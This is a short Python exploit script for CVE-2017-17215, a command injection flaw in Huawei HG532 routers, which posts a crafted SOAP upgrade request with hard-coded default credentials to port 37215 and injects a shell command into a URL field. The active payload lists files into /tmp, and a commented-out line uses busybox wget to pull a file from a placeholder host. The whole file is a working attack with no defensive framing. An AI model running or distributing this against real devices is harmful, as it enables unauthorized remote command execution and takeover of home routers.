# coding:utf-8
# refer: https://www.exploit-db.com/exploits/43414
import requests
from requests.auth import HTTPDigestAuth

def run(url):
    """CVE-2017-17215"""
    cmd = "busybox ls > /tmp/b4" # mips
    # cmd = "busybox wget -g xx.xx.xx.xx -l /tmp/1.txt -r 1.txt"
    payload="<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
    url = url + ":37215/ctrlt/DeviceUpgrade_1"
    req = requests.post(url, timeout=5, auth=HTTPDigestAuth("dslf-config",'admin'), data=payload)
    if req.status_code== 200 and "WANPPPConnection" in req.text:
        return "huawei HG532 router rce cve-2017-17215"
    else:
        return False


if __name__  == "__main__":
    print(run("http://192.168.127.137"))
